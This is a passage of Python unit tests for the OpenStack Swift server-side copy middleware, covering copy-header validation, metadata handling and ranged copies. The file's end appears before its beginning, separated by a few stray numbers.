'/v1/a/c1/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', method='COPY', headers=put_headers) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers self.assertEqual(2, len(calls)) method, path, req_headers = calls[1] self.assertEqual('PUT', method) # these headers should always be applied to the destination self.assertEqual('added', req_headers.get('X-Object-Meta-Test2')) self.assertEqual('added', req_headers.get('X-Object-Sysmeta-Test2')) self.assertEqual('added', req_headers.get('X-Object-Transient-Sysmeta-Test2')) return req_headers def test_COPY_source_headers_no_updates(self): # copy should preserve existing metadata if not updated req_headers = self._test_COPY_source_headers({}) self.assertEqual('text/original', req_headers.get('Content-Type')) self.assertEqual('gzip', req_headers.get('Content-Encoding')) self.assertEqual('attachment; filename=myfile', req_headers.get('Content-Disposition')) self.assertEqual('original', req_headers.get('X-Object-Meta-Test')) self.assertEqual('original', req_headers.get('X-Object-Sysmeta-Test')) self.assertEqual('original', req_headers.get('X-Object-Transient-Sysmeta-Test')) self.assertEqual('Bar', req_headers.get('X-Foo')) self.assertNotIn('X-Timestamp', req_headers) self.assertNotIn('X-Backend-Timestamp', req_headers) def test_COPY_source_headers_with_updates(self): # copy should apply any updated values to existing metadata put_headers = { 'Content-Type': 'text/not_original', 'Content-Encoding': 'not_gzip', 'Content-Disposition': 'attachment; filename=notmyfile', 'X-Object-Meta-Test': 'not_original', 'X-Object-Sysmeta-Test': 'not_original', 'X-Object-Transient-Sysmeta-Test': 'not_original', 'X-Foo': 'Not Bar'} req_headers = self._test_COPY_source_headers(put_headers) self.assertEqual('text/not_original', req_headers.get('Content-Type')) self.assertEqual('not_gzip', req_headers.get('Content-Encoding')) self.assertEqual('attachment; 
filename=notmyfile', req_headers.get('Content-Disposition')) self.assertEqual('not_original', req_headers.get('X-Object-Meta-Test')) self.assertEqual('not_original', req_headers.get('X-Object-Sysmeta-Test')) self.assertEqual('not_original', req_headers.get('X-Object-Transient-Sysmeta-Test')) self.assertEqual('Not Bar', req_headers.get('X-Foo')) self.assertNotIn('X-Timestamp', req_headers) self.assertNotIn('X-Backend-Timestamp', req_headers) def test_COPY_x_fresh_metadata_no_updates(self): # existing user metadata should not be copied, sysmeta is copied put_headers = { 'X-Fresh-Metadata': 'true', 'X-Extra': 'Fresh'} req_headers = self._test_COPY_source_headers(put_headers) self.assertEqual('text/original', req_headers.get('Content-Type')) self.assertEqual('Fresh', req_headers.get('X-Extra')) self.assertEqual('original', req_headers.get('X-Object-Sysmeta-Test')) self.assertIn('X-Fresh-Metadata', req_headers) self.assertNotIn('X-Object-Meta-Test', req_headers) self.assertNotIn('X-Object-Transient-Sysmeta-Test', req_headers) self.assertNotIn('X-Timestamp', req_headers) self.assertNotIn('X-Backend-Timestamp', req_headers) self.assertNotIn('Content-Encoding', req_headers) self.assertNotIn('Content-Disposition', req_headers) self.assertNotIn('X-Foo', req_headers) def test_COPY_x_fresh_metadata_with_updates(self): # existing user metadata should not be copied, new metadata replaces it put_headers = { 'X-Fresh-Metadata': 'true', 'Content-Type': 'text/not_original', 'Content-Encoding': 'not_gzip', 'Content-Disposition': 'attachment; filename=notmyfile', 'X-Object-Meta-Test': 'not_original', 'X-Object-Sysmeta-Test': 'not_original', 'X-Object-Transient-Sysmeta-Test': 'not_original', 'X-Foo': 'Not Bar', 'X-Extra': 'Fresh'} req_headers = self._test_COPY_source_headers(put_headers) self.assertEqual('Fresh', req_headers.get('X-Extra')) self.assertEqual('text/not_original', req_headers.get('Content-Type')) self.assertEqual('not_gzip', req_headers.get('Content-Encoding')) 
self.assertEqual('attachment; filename=notmyfile', req_headers.get('Content-Disposition')) self.assertEqual('not_original', req_headers.get('X-Object-Meta-Test')) self.assertEqual('not_original', req_headers.get('X-Object-Sysmeta-Test')) self.assertEqual('not_original', req_headers.get('X-Object-Transient-Sysmeta-Test')) self.assertEqual('Not Bar', req_headers.get('X-Foo')) def test_COPY_with_single_range(self): # verify that source etag is not copied when copying a range self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {'etag': 'bogus etag'}, "abcdefghijklmnop") self.app.register('PUT', '/v1/a/c1/o', swob.HTTPCreated, {}) req = swob.Request.blank( '/v1/a/c/o', method='COPY', headers={'Destination': 'c1/o', 'Range': 'bytes=5-10'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers self.assertEqual(2, len(calls)) method, path, req_headers = calls[1] self.assertEqual('PUT', method) self.assertEqual('/v1/a/c1/o', path) self.assertNotIn('etag', (h.lower() for h in req_headers)) self.assertEqual('6', req_headers['content-length']) req = swob.Request.blank('/v1/a/c1/o', method='GET') status, headers, body = self.call_ssc(req) self.assertEqual('fghijk', body) @patch_policies(with_ec_default=True) class TestServerSideCopyMiddlewareWithEC(unittest.TestCase): container_info = { 'status': 200, 'write_acl': None, 'read_acl': None, 'storage_policy': None, 'sync_key': None, 'versions': None, } def setUp(self): self.logger = debug_logger('proxy-server') self.logger.thread_locals = ('txn1', '127.0.0.2') self.app = PatchedObjControllerApp( None, FakeMemcache(), account_ring=FakeRing(), container_ring=FakeRing(), logger=self.logger) self.ssc = copy.filter_factory({})(self.app) self.ssc.logger = self.app.logger self.policy = POLICIES.default self.app.container_info = dict(self.container_info) def test_COPY_with_single_range(self): req = swob.Request.blank( '/v1/a/c/o', method='COPY', headers={'Destination': 'c1/o', 
'Range': 'bytes=5-10'}) # turn a real body into fragments segment_size = self.policy.ec_segment_size real_body = ('asdf' * segment_size)[:-10] # split it up into chunks chunks = [real_body[x:x + segment_size] for x in range(0, len(real_body), segment_size)] # we need only first chunk to rebuild 5-10 range fragments = self.policy.pyeclib_driver.encode(chunks[0]) fragment_payloads = [] fragment_payloads.append(fragments) node_fragments = zip(*fragment_payloads) self.assertEqual(len(node_fragments), self.policy.object_ring.replicas) # sanity headers = {'X-Object-Sysmeta-Ec-Content-Length': str(len(real_body))} responses = [(200, ''.join(node_fragments[i]), headers) for i in range(POLICIES.default.ec_ndata)] responses += [(201, '', {})] * self.policy.object_ring.replicas status_codes, body_iter, headers = zip(*responses) expect_headers = { 'X-Obj-Metadata-Footer': 'yes', 'X-Obj-Multiphase-Commit': 'yes' } put_hdrs = [] def capture_conn(host, port, dev, part, method, path, *args, **kwargs): if method == 'PUT': put_hdrs.append(args[0]) with set_http_connect(*status_codes, body_iter=body_iter, headers=headers, expect_headers=expect_headers, give_connect=capture_conn): resp = req.get_response(self.ssc) self.assertEqual(resp.status_int, 201) expected_puts = POLICIES.default.ec_ndata + POLICIES.default.ec_nparity self.assertEqual(expected_puts, len(put_hdrs)) for hdrs in put_hdrs: # etag should not be copied from source self.assertNotIn('etag', (h.lower() for h in hdrs)) def test_COPY_with_invalid_ranges(self): # real body size is segment_size - 10 (just 1 segment) segment_size = self.policy.ec_segment_size real_body = ('a' * segment_size)[:-10] # range is out of real body but in segment size self._test_invalid_ranges('COPY', real_body, segment_size, '%s-' % (segment_size - 10)) # range is out of both real body and segment size self._test_invalid_ranges('COPY', real_body, segment_size, '%s-' % (segment_size + 10)) def _test_invalid_ranges(self, method, real_body, 
segment_size, req_range): # make a request with range starts from more than real size. body_etag = md5(real_body).hexdigest() req = swob.Request.blank( '/v1/a/c/o', method=method, headers={'Destination': 'c1/o', 'Range': 'bytes=%s' % (req_range)}) fragments = self.policy.pyeclib_driver.encode(real_body) fragment_payloads = [fragments] node_fragments = zip(*fragment_payloads) self.assertEqual(len(node_fragments), self.policy.object_ring.replicas) # sanity headers = {'X-Object-Sysmeta-Ec-Content-Length': str(len(real_body)), 'X-Object-Sysmeta-Ec-Etag': body_etag} start = int(req_range.split('-')[0]) self.assertTrue(start >= 0) # sanity title, exp = swob.RESPONSE_REASONS[416] range_not_satisfiable_body = \ '<html><h1>%s</h1><p>%s</p></html>' % (title, exp) if start >= segment_size: responses = [(416, range_not_satisfiable_body, headers) for i in range(POLICIES.default.ec_ndata)] else: responses = [(200, ''.join(node_fragments[i]), headers) for i in range(POLICIES.default.ec_ndata)] status_codes, body_iter, headers = zip(*responses) expect_headers = { 'X-Obj-Metadata-Footer': 'yes', 'X-Obj-Multiphase-Commit': 'yes' } # TODO possibly use FakeApp here with set_http_connect(*status_codes, body_iter=body_iter, headers=headers, expect_headers=expect_headers): resp = req.get_response(self.ssc) self.assertEqual(resp.status_int, 416) self.assertEqual(resp.content_length, len(range_not_satisfiable_body)) self.assertEqual(resp.body, range_not_satisfiable_body) self.assertEqual(resp.etag, body_etag) self.assertEqual(resp.headers['Accept-Ranges'], 'bytes')
50.193594
79
0.580344
import mock import unittest from hashlib import md5 from six.moves import urllib from swift.common import swob from swift.common.middleware import copy from swift.common.storage_policy import POLICIES from swift.common.swob import Request, HTTPException from swift.common.utils import closing_if_possible from test.unit import patch_policies, debug_logger, FakeMemcache, FakeRing from test.unit.common.middleware.helpers import FakeSwift from test.unit.proxy.controllers.test_obj import set_http_connect, \ PatchedObjControllerApp class TestCopyConstraints(unittest.TestCase): def test_validate_copy_from(self): req = Request.blank( '/v/a/c/o', headers={'x-copy-from': 'c/o2'}) src_cont, src_obj = copy._check_copy_from_header(req) self.assertEqual(src_cont, 'c') self.assertEqual(src_obj, 'o2') req = Request.blank( '/v/a/c/o', headers={'x-copy-from': 'c/subdir/o2'}) src_cont, src_obj = copy._check_copy_from_header(req) self.assertEqual(src_cont, 'c') self.assertEqual(src_obj, 'subdir/o2') req = Request.blank( '/v/a/c/o', headers={'x-copy-from': '/c/o2'}) src_cont, src_obj = copy._check_copy_from_header(req) self.assertEqual(src_cont, 'c') self.assertEqual(src_obj, 'o2') def test_validate_bad_copy_from(self): req = Request.blank( '/v/a/c/o', headers={'x-copy-from': 'bad_object'}) self.assertRaises(HTTPException, copy._check_copy_from_header, req) def test_validate_destination(self): req = Request.blank( '/v/a/c/o', headers={'destination': 'c/o2'}) src_cont, src_obj = copy._check_destination_header(req) self.assertEqual(src_cont, 'c') self.assertEqual(src_obj, 'o2') req = Request.blank( '/v/a/c/o', headers={'destination': 'c/subdir/o2'}) src_cont, src_obj = copy._check_destination_header(req) self.assertEqual(src_cont, 'c') self.assertEqual(src_obj, 'subdir/o2') req = Request.blank( '/v/a/c/o', headers={'destination': '/c/o2'}) src_cont, src_obj = copy._check_destination_header(req) self.assertEqual(src_cont, 'c') self.assertEqual(src_obj, 'o2') def 
test_validate_bad_destination(self): req = Request.blank( '/v/a/c/o', headers={'destination': 'bad_object'}) self.assertRaises(HTTPException, copy._check_destination_header, req) class TestServerSideCopyMiddleware(unittest.TestCase): def setUp(self): self.app = FakeSwift() self.ssc = copy.filter_factory({})(self.app) self.ssc.logger = self.app.logger def tearDown(self): self.assertEqual(self.app.unclosed_requests, {}) def call_app(self, req, app=None, expect_exception=False): if app is None: app = self.app self.authorized = [] def authorize(req): self.authorized.append(req) if 'swift.authorize' not in req.environ: req.environ['swift.authorize'] = authorize req.headers.setdefault("User-Agent", "Bruce Wayne") status = [None] headers = [None] def start_response(s, h, ei=None): status[0] = s headers[0] = h body_iter = app(req.environ, start_response) body = '' caught_exc = None try: with closing_if_possible(body_iter): for chunk in body_iter: body += chunk except Exception as exc: if expect_exception: caught_exc = exc else: raise if expect_exception: return status[0], headers[0], body, caught_exc else: return status[0], headers[0], body def call_ssc(self, req, **kwargs): return self.call_app(req, app=self.ssc, **kwargs) def assertRequestEqual(self, req, other): self.assertEqual(req.method, other.method) self.assertEqual(req.path, other.path) def test_no_object_in_path_pass_through(self): self.app.register('PUT', '/v1/a/c', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c', method='PUT') status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertEqual(len(self.authorized), 1) self.assertRequestEqual(req, self.authorized[0]) def test_object_pass_through_methods(self): for method in ['DELETE', 'GET', 'HEAD', 'REPLICATE']: self.app.register(method, '/v1/a/c/o', swob.HTTPOk, {}) req = Request.blank('/v1/a/c/o', method=method) status, headers, body = self.call_ssc(req) self.assertEqual(status, '200 OK') 
self.assertEqual(len(self.authorized), 1) self.assertRequestEqual(req, self.authorized[0]) self.assertNotIn('swift.orig_req_method', req.environ) def test_basic_put_with_x_copy_from(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a/c/o2', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o2', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': 'c/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From', 'c/o') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o2', self.authorized[1].path) self.assertEqual(self.app.swift_sources[0], 'SSC') self.assertEqual(self.app.swift_sources[1], 'SSC') self.assertNotIn('swift.orig_req_method', req.environ) def test_static_large_object_manifest(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {'X-Static-Large-Object': 'True', 'Etag': 'should not be sent'}, 'passed') self.app.register('PUT', '/v1/a/c/o2?multipart-manifest=put', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o2?multipart-manifest=get', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': 'c/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From', 'c/o') in headers) self.assertEqual(2, len(self.app.calls)) self.assertEqual('GET', self.app.calls[0][0]) get_path, qs = self.app.calls[0][1].split('?') params = urllib.parse.parse_qs(qs) self.assertDictEqual( {'format': ['raw'], 'multipart-manifest': ['get']}, params) self.assertEqual(get_path, '/v1/a/c/o') self.assertEqual(self.app.calls[1], ('PUT', '/v1/a/c/o2?multipart-manifest=put')) req_headers = self.app.headers[1] self.assertNotIn('X-Static-Large-Object', req_headers) 
self.assertNotIn('Etag', req_headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o2', self.authorized[1].path) def test_static_large_object(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {'X-Static-Large-Object': 'True', 'Etag': 'should not be sent'}, 'passed') self.app.register('PUT', '/v1/a/c/o2', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o2', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': 'c/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From', 'c/o') in headers) self.assertEqual(self.app.calls, [ ('GET', '/v1/a/c/o'), ('PUT', '/v1/a/c/o2')]) req_headers = self.app.headers[1] self.assertNotIn('X-Static-Large-Object', req_headers) self.assertNotIn('Etag', req_headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o2', self.authorized[1].path) def test_basic_put_with_x_copy_from_across_container(self): self.app.register('GET', '/v1/a/c1/o1', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a/c2/o2', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c2/o2', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': 'c1/o1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From', 'c1/o1') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c1/o1', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c2/o2', self.authorized[1].path) def 
test_basic_put_with_x_copy_from_across_container_and_account(self): self.app.register('GET', '/v1/a1/c1/o1', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a2/c2/o2', swob.HTTPCreated, {}, 'passed') req = Request.blank('/v1/a2/c2/o2', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': 'c1/o1', 'X-Copy-From-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From', 'c1/o1') in headers) self.assertTrue(('X-Copied-From-Account', 'a1') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a1/c1/o1', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a2/c2/o2', self.authorized[1].path) def test_copy_non_zero_content_length(self): req = Request.blank('/v1/a/c2/o2', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '10', 'X-Copy-From': 'c1/o1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '400 Bad Request') def test_copy_non_zero_content_length_with_account(self): req = Request.blank('/v1/a2/c2/o2', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '10', 'X-Copy-From': 'c1/o1', 'X-Copy-From-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '400 Bad Request') def test_copy_with_slashes_in_x_copy_from(self): self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': 'c/o/o2'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From', 'c/o/o2') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path) 
self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o', self.authorized[1].path) def test_copy_with_slashes_in_x_copy_from_and_account(self): self.app.register('GET', '/v1/a1/c1/o/o1', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a2/c2/o2', swob.HTTPCreated, {}) req = Request.blank('/v1/a2/c2/o2', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': 'c1/o/o1', 'X-Copy-From-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From', 'c1/o/o1') in headers) self.assertTrue(('X-Copied-From-Account', 'a1') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a1/c1/o/o1', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a2/c2/o2', self.authorized[1].path) def test_copy_with_spaces_in_x_copy_from(self): self.app.register('GET', '/v1/a/c/o o2', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': 'c/o%20o2'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[0] self.assertEqual('GET', method) self.assertEqual('/v1/a/c/o o2', path) self.assertTrue(('X-Copied-From', 'c/o%20o2') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o%20o2', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o', self.authorized[1].path) def test_copy_with_spaces_in_x_copy_from_and_account(self): self.app.register('GET', '/v1/a/c/o o2', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a1/c1/o', 
environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': 'c/o%20o2', 'X-Copy-From-Account': 'a'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[0] self.assertEqual('GET', method) self.assertEqual('/v1/a/c/o o2', path) self.assertTrue(('X-Copied-From', 'c/o%20o2') in headers) self.assertTrue(('X-Copied-From-Account', 'a') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o%20o2', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a1/c1/o', self.authorized[1].path) def test_copy_with_leading_slash_in_x_copy_from(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[0] self.assertEqual('GET', method) self.assertEqual('/v1/a/c/o', path) self.assertTrue(('X-Copied-From', 'c/o') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o', self.authorized[1].path) def test_copy_with_leading_slash_in_x_copy_from_and_account(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a1/c1/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c/o', 'X-Copy-From-Account': 'a'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls 
= self.app.calls_with_headers method, path, req_headers = calls[0] self.assertEqual('GET', method) self.assertEqual('/v1/a/c/o', path) self.assertTrue(('X-Copied-From', 'c/o') in headers) self.assertTrue(('X-Copied-From-Account', 'a') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a1/c1/o', self.authorized[1].path) def test_copy_with_leading_slash_and_slashes_in_x_copy_from(self): self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c/o/o2'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[0] self.assertEqual('GET', method) self.assertEqual('/v1/a/c/o/o2', path) self.assertTrue(('X-Copied-From', 'c/o/o2') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o', self.authorized[1].path) def test_copy_with_leading_slash_and_slashes_in_x_copy_from_acct(self): self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a1/c1/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c/o/o2', 'X-Copy-From-Account': 'a'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[0] self.assertEqual('GET', method) self.assertEqual('/v1/a/c/o/o2', path) self.assertTrue(('X-Copied-From', 'c/o/o2') in 
headers) self.assertTrue(('X-Copied-From-Account', 'a') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a1/c1/o', self.authorized[1].path) def test_copy_with_no_object_in_x_copy_from(self): req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '412 Precondition Failed') def test_copy_with_no_object_in_x_copy_from_and_account(self): req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c', 'X-Copy-From-Account': 'a'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '412 Precondition Failed') def test_copy_with_bad_x_copy_from_account(self): req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c/o', 'X-Copy-From-Account': '/i/am/bad'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '412 Precondition Failed') def test_copy_server_error_reading_source(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPServiceUnavailable, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '503 Service Unavailable') def test_copy_server_error_reading_source_and_account(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPServiceUnavailable, {}) req = Request.blank('/v1/a1/c1/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c/o', 'X-Copy-From-Account': 'a'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '503 Service Unavailable') self.assertEqual(len(self.authorized), 1) self.assertEqual('GET', 
self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) def test_copy_not_found_reading_source(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPNotFound, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '404 Not Found') self.assertEqual(len(self.authorized), 1) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) def test_copy_not_found_reading_source_and_account(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPNotFound, {}) req = Request.blank('/v1/a1/c1/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c/o', 'X-Copy-From-Account': 'a'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '404 Not Found') self.assertEqual(len(self.authorized), 1) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) def test_copy_with_object_metadata(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c/o', 'X-Object-Meta-Ours': 'okay'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[1] self.assertEqual('PUT', method) self.assertEqual('/v1/a/c/o', path) self.assertEqual(req_headers['X-Object-Meta-Ours'], 'okay') self.assertTrue(('X-Object-Meta-Ours', 'okay') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o', self.authorized[1].path) def 
test_copy_with_object_metadata_and_account(self): self.app.register('GET', '/v1/a1/c/o', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c/o', 'X-Object-Meta-Ours': 'okay', 'X-Copy-From-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[1] self.assertEqual('PUT', method) self.assertEqual('/v1/a/c/o', path) self.assertEqual(req_headers['X-Object-Meta-Ours'], 'okay') self.assertTrue(('X-Object-Meta-Ours', 'okay') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a1/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o', self.authorized[1].path) def test_copy_source_larger_than_max_file_size(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, "largebody") req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'Content-Length': '0', 'X-Copy-From': '/c/o'}) with mock.patch('swift.common.middleware.copy.' 
